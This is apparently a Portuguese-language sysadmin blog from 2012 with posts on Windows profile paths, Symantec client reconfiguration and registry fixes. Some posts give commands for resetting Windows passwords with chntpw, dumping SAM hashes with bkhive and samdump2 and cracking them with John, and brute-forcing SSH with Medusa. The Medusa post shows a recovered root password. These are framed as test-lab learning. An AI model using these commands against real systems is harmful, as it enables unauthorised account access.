quinta-feira, maio 24, 2012

Alterar diretório perfil usuários – Windows 2003

Por padrão o diretório padrão do perfil de usuários é %SystemDrive%\Documents and Settings este valor é armazenado na seguinte chave de registro: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ ProfilesDirectory
No exemplo abaixo alterei para D:\Perfil


Lembrando que após a instalação do SO, isso deve ser executado primeiramente, antes de qualquer outra instalação.
Copiar a pasta “Default User”, para o D:\Perfil (essa pasta é oculta por padrão), pasta All User deverá ser copiada para o caminho D:\Perfil, é necessário pesquisar no registro e alterar de %SystemDrive%\Documents and Settings para D:\Perfil, os valores das contas "Default User" e "All User".


sábado, maio 19, 2012

Certificado LPI

Chegou mais rápido do que eu imaginava:


sábado, maio 12, 2012

Ferramenta RunasSpc


A ferramenta RunasSpc permite a execução de um programa com um usuário diferente do atualmente "logado", bem interessante caso seja necessário a execução de um determinado programa com privilégios administrativos, mas o usuário atualmente conectado não tem estes privilégios, isso é útil na criação de batch, no Windows temos o comando run as, só que não tem como especificar a senha através deste comando, mas para isso temos o runasspc!.

Ex de utilização:
runasspc.exe  /program:"C:\Program Files\Windows NT\Pinball\pinball.exe" /domain:"localhost" /user:"testadmin" /password:"password"

Link da ferramenta:
http://www.robotronic.de/runasspc.html

 

sexta-feira, maio 11, 2012

Batch Symantec

Após a migração e atualização (versão 12 do EndPoint Protection) para um novo servidor de gerenciamento os clientes, perderam a comunicação com o SEPM, mesmo efetuando os procedimentos recomendados pela Symantec (configuração de replicação etc) não consegui estabelecer a comunicação entre os clientes e o SEPM, para resolver o problema gerei o arquivo syslink.xml que reconfigura a comunicação entre os clientes e o SEPM, e importei no caminho de instalação do Symantec, abaixo um batch que efetua essa configuração:

@echo off
echo "Update manager Symantec "
IF "%COMPUTERNAME%" == "NB-MAYKON" GOTO EXIT

cd "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection"
IF %ERRORLEVEL% == 0 GOTO 32EN

cd "C:\Arquivos de programas\Symantec\Symantec Endpoint Protection"
IF %ERRORLEVEL% == 0 GOTO 32PT

cd "C:\Program Files\Symantec\Symantec Endpoint Protection"
IF %ERRORLEVEL% == 0 GOTO 64

echo ==== EXIT ====
GOTO EXIT

:32EN
echo "32 bits"
echo ===== STOP SMC.exe =====
Smc.exe -stop
echo ==== Copy File ====
copy "\\server\syslink\sylink.xml" /Y
echo ===== START SMC.exe =====
Smc.exe -start
GOTO EXIT

:32PT
echo ==== STOP SMC.exe ====
Smc.exe -stop
echo ===== Copy File =====
copy "\\server\syslink\sylink.xml" /Y
echo ===== Start Symantec =====
Smc.exe -start
echo ==== EXIT ===
GOTO EXIT

:64
cd "C:\Program Files\Symantec\Symantec Endpoint Protection"
echo "64 bits"
Smc.exe -stop
echo ==== Copy File ====
copy "\\server\syslink\sylink.xml" /Y
echo ===== START SMC.exe =====
Smc.exe -start

:EXIT

sábado, maio 05, 2012

Resetar senha Windows

É possível resetar a senha de qualquer usuário em sistemas operacionais Windows, utilizando a ferramenta "chntpw", disponível no backtTrack, para isso basta ter acesso físico no respectivo "alvo", e editar o arquivo SAM disponível em /Windows/System32/Config (Levando em conta que você já montou o disco com o comando mount), abaixo um print da ferramenta (ferramenta bem simples):

samdump2

Ferramenta interessante, com ela é possível gerar um "dump" de senhas de Sistemas Operacionais, abaixo os passos necessários, efetuei os testes em ambiente de teste, utilizando o backTrack e o "alvo" foi um Sistema Operacional Windows Server 2003.
Efetuar boot com o backTrack ou similar, montar o disco local (comando mount), eu prefiro copiar via SCP os arquivos necessários (para uma outra máquina), que são system e SAM que estão disponíveis no seguinte caminho: /windows/system32/config/

# utilizar o bkhive para gerar o key.txt
#bkhive system key.txt

Utilizando o samdump2 para gerar um hash
#samdump2 SAM key.txt > hashes.txt

Depois utilizar a ferramenta john para quebrar a senha
#/pentest/passwords/john/./john hashes.txt

Demorou cerca de 3 horas para a senha ser parcialmente quebrada, mas quebrar senhas do Windows não é uma tarefa simples, pois isso envolve tipos de autenticação (LAN Manager, NTLM, kerberos etc ), é um assunto muito interessante, vale a pena estudá-lo.

sexta-feira, maio 04, 2012

Pending Reboot Requirement: System Center Essentials 2010

Ao tentar efetuar a instalação do System Center Essentials 2010 não passava dos requisitos, solicitava reinicialização do sistema, mesmo reiniciando mais de uma vez não era possível iniciar a instalação, para resolver este problema bastou editar uma chave do registro, após a edição foi possível efetuar a instalação.
Acessar o seguinte caminho: "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager".
Renomar a chave: "PendingFileRenameOperations" para "PendingFileRenameOperations2". 

terça-feira, maio 01, 2012

Medusa


Ferramenta utilizada para realizar “login brute-forcer”, suporta diversos serviços, abaixo um exemplo de utilização:
 # medusa -h 10.10.8.163 -u root -P passwords -M ssh











O comando acima funciona da seguinte maneira, medusa é a ferramenta, -h especifica o alto, -u é o usuário, mas também posso utilizar um arquivo com diversos usuários, -P específica o arquivo com a lista das possíveis senhas, neste caso o arquivo chama-se "passwords" e contém as seguintes possíveis senhas: 
root
admin
12345
suporte
rootroot
 -M o serviço a ser atacado, no exemplo SSH. Após algumas tentativas obtenho o seguinte resultado:
ACCOUNT FOUND: [ssh] Host: 10.10.8.163 User: root Password: rootroot [SUCCESS]
Pronto a senha foi descoberta, rootroot.
Informações sobre a ferramenta: